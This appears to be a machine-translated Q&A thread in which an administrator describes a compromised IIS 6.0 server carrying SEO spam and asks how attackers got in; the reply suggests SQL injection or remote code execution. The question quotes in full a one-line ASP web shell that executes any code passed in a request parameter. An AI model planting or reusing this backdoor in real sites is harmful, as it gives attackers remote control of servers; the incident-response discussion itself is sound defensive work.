2013-10-07 39 views
1

我的一位客户在谷歌搜索结果中注意到一条消息,称他们的网站可能已被黑客入侵。经过一番挖掘,我发现服务器上包含seo垃圾和JavaScript引用的html文件。我删除这些文件,更改密码CMS,更新一样CKFinder等一些部件...我认为我被黑客入侵并寻求建议

然后我就开始寻找到服务器上的其他网站,发现吨的.asp文件与该行

<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile 

我已经删除了那些,但不知道他们是如何到达那里的。我已经浏览了各种日志(事件查看器,网站,ftp),但大多数文件创建后的时间不够长。

我已经更新了操作系统,这只有一两个过时的时间,并且改变了ftp访问。

我还能做些什么来找到入口点或确保我的服务器和网站安全吗?

BTW:这是运行IIS 6.0的Windows 2003服务器。

+0

Windows 2003中是“只有一两个月过时”? – geoffspear

+0

参考Windows更新... – SirM

回答

0

他们可能有多种方式访问​​您的服务器。

您是否运行常见的CMS或自定义? 他们可能在您的某个脚本中找到了漏洞。

例如,如果他们发现SQL注入漏洞,他们可以检索数据库信息。 如果他们在哪里可以找到RCE错误(远程代码执行),他们可能已经能够执行导致创建这些任意文件的系统命令。

除此之外,还有已经在本周打补丁的Windows Server的几个漏洞,看看这个链接: http://blog.spiderlabs.com/2014/02/microsoft-patch-tuesday-february-2014.html

相关问题